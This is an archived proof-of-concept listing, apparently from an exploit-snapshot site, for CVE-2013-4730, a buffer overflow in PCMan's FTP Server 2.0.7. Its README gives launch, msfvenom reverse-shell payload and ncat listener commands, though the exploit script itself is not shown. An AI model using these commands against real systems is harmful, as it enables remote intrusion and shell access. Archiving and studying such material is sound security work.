CVE-2013-4730 PoC — PCMan's FTP Server 缓冲区溢出漏洞

Source

Associated Vulnerability

Title:PCMan's FTP Server 缓冲区溢出漏洞 (CVE-2013-4730)
Description:PCMan's FTP Server是洪任谕程序员所研发的一套FTP服务器软件。该软件具有体积小、功能简单等特点。 PCMan's FTP Server 2.0.7版本中存在缓冲区溢出漏洞。远程攻击者可借助USER命令中的长字符串利用该漏洞执行任意代码。

Description

A very simple buffer overflow using CVE-2013-4730 against PCman's FTP server

Readme

# PCman FTP Server Buffer overflow and Remote Code Execution [CVE-2013-4730]
A very simple buffer overflow using CVE-2013-4730 against PCman's FTP server v.2.0.7
## How it works?
That easy BoF overwrite the buffer and execute the shellcode that will connect back (reverse shell)
## Vuln machines:
WindowsXP SP3 running PCman's FTP Server at version 2.0.7
## launch
````~$ python3 PCman.py <host> <port>````
## Repleace the shellcode with your own!!
````~$ sudo ./msfvenom windows/shell_reverse_tcp LHOST=<your ip> LPORT=4444````
## Launch netcat 
````~$ ncat -lvp <shellcode port>````
## Use only on your own machine!!

File Snapshot


 [4.0K]  /data/pocs/2af4b18b0fddfb89f3d7a58df0050ff1521947df
├── [ 34K]  LICENSE
├── [3.6K]  PCMan.py
└── [ 619]  README.md

0 directories, 3 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!